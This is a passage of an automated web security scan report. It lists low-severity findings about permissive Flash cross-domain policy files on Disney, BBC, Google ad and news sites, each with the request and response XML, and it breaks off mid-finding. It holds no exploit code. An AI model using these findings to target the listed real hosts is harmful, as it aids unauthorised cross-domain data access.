...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.63. http://disneycruise.disney.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disneycruise.disney.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disneycruise.disney.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:35:44 GMT
Date: Mon, 16 May 2011 01:35:02 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.64. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:04 GMT
Date: Sun, 15 May 2011 21:19:04 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.65. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:44:43 GMT
Expires: Mon, 16 May 2011 10:44:43 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 38783
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.66. http://i.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
ETag: "0f8ee1317e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:46 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.67. http://images.scanalert.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:39:43 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.68. http://imawow.weather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imawow.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imawow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache
SVRNAME: web1x11
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7387
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.69. http://login.dotomi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
Server: Apache
X-Name: dmc-o01
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.70. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:03 GMT
Date: Sun, 15 May 2011 21:19:03 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.71. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:49 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.72. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 11:30:02 GMT
Expires: Mon, 16 May 2011 11:30:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49790
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.73. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

